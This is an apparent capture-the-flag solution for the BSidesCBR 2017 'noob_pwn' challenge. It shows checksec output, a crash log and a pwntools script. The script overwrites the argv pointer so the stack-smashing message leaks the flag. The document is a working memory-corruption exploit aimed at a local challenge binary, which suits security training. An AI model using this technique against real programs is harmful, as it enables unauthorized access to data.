noob_pwn [150pt] BSIDESCBR2017 solution

noob_pwn.py

#!/usr/bin/env python
"""
There is no ASLR for this challenge

gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : FULL

flag:
    0x400800 ("BSIDES_CTF{FLAGISHEREONTHESERVER!}")


[mnz@noctis Downloads]$ ./noob_download
Gimme the data: asdfasdfasdfasdf
Go on then, break me: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** stack smashing detected ***: ./noob_download terminated
Segmentation fault (core dumped)

[mnz@noctis ~]$ ./noob_pwn_exploit.py 
[+] Opening connection to 127.0.0.1 on port 6000: Done
[+] Receiving all data: Done (116B)
[*] Closed connection to 127.0.0.1 port 6000
Gimme the data: Go on then, break me: *** stack smashing detected *** BSIDES_CTF{d3m_st@kk_proTectionz!} terminated

"""
from pwn import *

target = remote('127.0.0.1', 6000)
exploit = "TERM=abc"                            # Requires TERM environment variable to be set
exploit += "B" * 287                            # Fill stack with garbage
exploit += "\x00\x08\x40\x00\x00\x00\x00\x00"   # Overwrite the argv pointer to where the flag is
exploit += "C" * 8                              # Fill garbage
exploit += "\x40\x10\x60\x00\x00\x00\x00\x00"   # Set our environment variable to point to `TERM=123`
exploit += "\n"

print target.recvall(target.send(exploit))